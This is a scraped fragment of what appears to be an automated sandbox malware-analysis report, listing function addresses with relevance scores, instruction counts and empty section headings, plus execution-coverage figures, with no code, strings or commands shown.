Function 004030C7 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405086 Relevance: 54.3, APIs: 36, Instructions: 282windowclipboardmemoryCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00404352 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 274stringCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004064CB Relevance: .3, Instructions: 334COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406CA2 Relevance: .3, Instructions: 300COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040405D Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 205windowstringCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405A78 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403F7B Relevance: 12.1, APIs: 8, Instructions: 61COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00404813 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402B7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401CDE Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401D38 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00404709 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004057A1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402C02 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040588F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004057E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405907 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06DCC936 Relevance: 41.8, Strings: 32, Instructions: 1844COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 043DE260 Relevance: .7, Instructions: 713COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06DCD716 Relevance: 30.0, Strings: 23, Instructions: 1234COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06DC5B52 Relevance: 27.1, Strings: 21, Instructions: 888COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06DC4D30 Relevance: 22.2, Strings: 17, Instructions: 904COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06DC4D12 Relevance: 18.3, Strings: 14, Instructions: 825COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06DCDB6C Relevance: 6.7, Strings: 5, Instructions: 435COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06DCD960 Relevance: 6.7, Strings: 5, Instructions: 434COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06DC3020 Relevance: 3.8, Strings: 2, Instructions: 1306COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 087E16C8 Relevance: 3.2, Strings: 2, Instructions: 695COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06DC4418 Relevance: 2.9, Strings: 2, Instructions: 373COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06DC4131 Relevance: 1.7, Strings: 1, Instructions: 498COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 087E1C38 Relevance: 1.5, Strings: 1, Instructions: 201COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06DC33A4 Relevance: .8, Instructions: 849COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06DC87C8 Relevance: .6, Instructions: 599COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06DC1148 Relevance: .6, Instructions: 594COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 087F0868 Relevance: .4, Instructions: 430COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06DC2CC0 Relevance: .3, Instructions: 277COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 043D731A Relevance: .3, Instructions: 265COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06DC6260 Relevance: .2, Instructions: 232COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06DC0840 Relevance: .2, Instructions: 231COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 043D2AA0 Relevance: .2, Instructions: 214COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 087F0E28 Relevance: .2, Instructions: 211COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 043D7BD6 Relevance: .2, Instructions: 188COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 043D7A53 Relevance: .2, Instructions: 169COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06DC0B48 Relevance: .2, Instructions: 168COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06DC2CA4 Relevance: .1, Instructions: 145COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 087F1DC0 Relevance: .1, Instructions: 127COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 043D77F9 Relevance: .1, Instructions: 126COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 043DB6F1 Relevance: .1, Instructions: 124COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06DC87AC Relevance: .1, Instructions: 124COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 087F1DB8 Relevance: .1, Instructions: 123COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 087F0841 Relevance: .1, Instructions: 122COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 043DF00C Relevance: .1, Instructions: 121COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 043DB700 Relevance: .1, Instructions: 119COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 087F17F0 Relevance: .1, Instructions: 117COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 087F1800 Relevance: .1, Instructions: 116COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 087F0E19 Relevance: .1, Instructions: 114COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 043D2BB0 Relevance: .1, Instructions: 110COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 043D7810 Relevance: .1, Instructions: 110COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06DC48B8 Relevance: .1, Instructions: 102COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 043DEF37 Relevance: .1, Instructions: 98COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06DC0EB0 Relevance: .1, Instructions: 94COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 087E18D8 Relevance: .1, Instructions: 87COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06DC0E94 Relevance: .1, Instructions: 77COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0273F288 Relevance: .1, Instructions: 76COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 087E3D46 Relevance: .1, Instructions: 72COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 043D9597 Relevance: .1, Instructions: 61COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06DC61B8 Relevance: .1, Instructions: 59COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0273F283 Relevance: .1, Instructions: 57COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 043DEEBA Relevance: .1, Instructions: 56COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0273D01D Relevance: .0, Instructions: 45COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0273D007 Relevance: .0, Instructions: 44COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 043DD590 Relevance: .0, Instructions: 41COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 043DEEC8 Relevance: .0, Instructions: 39COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 043DF1D0 Relevance: .0, Instructions: 38COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 043DCCA8 Relevance: .0, Instructions: 37COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 043DD5A0 Relevance: .0, Instructions: 37COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 043DF1C2 Relevance: .0, Instructions: 34COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 043DCC5D Relevance: .0, Instructions: 31COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 043DFB6B Relevance: .0, Instructions: 31COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 043DFD3F Relevance: .0, Instructions: 28COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 043DFB78 Relevance: .0, Instructions: 24COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 043DCC70 Relevance: .0, Instructions: 21COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 043DF938 Relevance: .0, Instructions: 20COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 043DFA03 Relevance: .0, Instructions: 20COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 043DFD50 Relevance: .0, Instructions: 16COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 043DF948 Relevance: .0, Instructions: 15COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 043DFA10 Relevance: .0, Instructions: 15COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06DC1A7E Relevance: .0, Instructions: 5COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06DCF45D Relevance: 5.2, Strings: 4, Instructions: 209COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06DC4A70 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Execution Graph
Execution Coverage: | 11.3% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 0% |
Total number of Nodes: | 4 |
Total number of Limit Nodes: | 0 |
Graph
Function 25DF9C18 Relevance: 3.5, Strings: 1, Instructions: 2264, Tags: COMMON
Function 25DF0B30 Relevance: 0.7, Instructions: 709, Tags: COMMON
Function 25DF9328 Relevance: 0.5, Instructions: 532, Tags: COMMON
Function 25DF2968 Relevance: 0.3, Instructions: 268, Tags: COMMON
Function 25DF2DC8 Relevance: 0.2, Instructions: 220, Tags: COMMON
Function 25DF2DBB Relevance: 0.2, Instructions: 220, Tags: COMMON
Function 25DF1E80 Relevance: 0.2, Instructions: 220, Tags: COMMON
Function 25DF17A0 Relevance: 0.2, Instructions: 219, Tags: COMMON
Function 25DF310E Relevance: 0.2, Instructions: 202, Tags: COMMON
Function 25DFFC68 Relevance: 0.2, Instructions: 200, Tags: COMMON
Function 25DF0B20 Relevance: 0.2, Instructions: 171, Tags: COMMON
Function 25DF178F Relevance: 0.2, Instructions: 165, Tags: COMMON
Function 25DF1E70 Relevance: 0.1, Instructions: 111, Tags: COMMON
Function 002ED044 Relevance: 0.1, Instructions: 72, Tags: COMMON
Function 25DF3FE8 Relevance: 2.9, Strings: 2, Instructions: 396, Tags: COMMON
Function 25DF4351 Relevance: 2.6, Strings: 2, Instructions: 101, Tags: COMMON
Function 25DF4385 Relevance: 2.6, Strings: 2, Instructions: 100, Tags: COMMON
Function 25DF3A50 Relevance: 1.5, Strings: 1, Instructions: 229, Tags: COMMON
Function 25DF4A68 Relevance: 0.2, Instructions: 212, Tags: COMMON
Function 25DF4790 Relevance: 0.1, Instructions: 114, Tags: COMMON
Function 25DFFC5B Relevance: 0.1, Instructions: 94, Tags: COMMON
Function 25DF48D0 Relevance: 0.1, Instructions: 91, Tags: COMMON
Function 25DF992C Relevance: 0.1, Instructions: 62, Tags: COMMON
Function 002ED03F Relevance: 0.1, Instructions: 53, Tags: COMMON
Function 25DF49E0 Relevance: 0.1, Instructions: 53, Tags: COMMON
Function 25DF3248 Relevance: 0.0, Instructions: 48, Tags: COMMON
Function 25DF3258 Relevance: 0.0, Instructions: 46, Tags: COMMON
Function 25DF44CF Relevance: 0.0, Instructions: 39, Tags: COMMON
Function 25DF4990 Relevance: 0.0, Instructions: 33, Tags: COMMON
Function 25DF4A40 Relevance: 0.0, Instructions: 17, Tags: COMMON
Function 0031F2C0 Relevance: 1.4, Strings: 1, Instructions: 147, Tags: COMMON
Function 0031F4AC Relevance: 1.4, Strings: 1, Instructions: 146, Tags: COMMON
Function 25DF0040 Relevance: 0.6, Instructions: 596, Tags: COMMON
Function 25DFD9A8 Relevance: 0.3, Instructions: 268, Tags: COMMON
Function 25DFD550 Relevance: 0.3, Instructions: 268, Tags: COMMON
Function 25DFD0F8 Relevance: 0.3, Instructions: 268, Tags: COMMON
Function 25DFCCA0 Relevance: 0.3, Instructions: 268, Tags: COMMON
Function 25DFF810 Relevance: 0.3, Instructions: 268, Tags: COMMON
Function 25DFF3B8 Relevance: 0.3, Instructions: 268, Tags: COMMON
Function 25DFEF60 Relevance: 0.3, Instructions: 268, Tags: COMMON
Function 25DFEB08 Relevance: 0.3, Instructions: 268, Tags: COMMON
Function 25DFE6B0 Relevance: 0.3, Instructions: 268, Tags: COMMON
Function 25DFE258 Relevance: 0.3, Instructions: 268, Tags: COMMON
Function 25DFDE00 Relevance: 0.3, Instructions: 268, Tags: COMMON
Function 0031F974 Relevance: 0.3, Instructions: 265, Tags: COMMON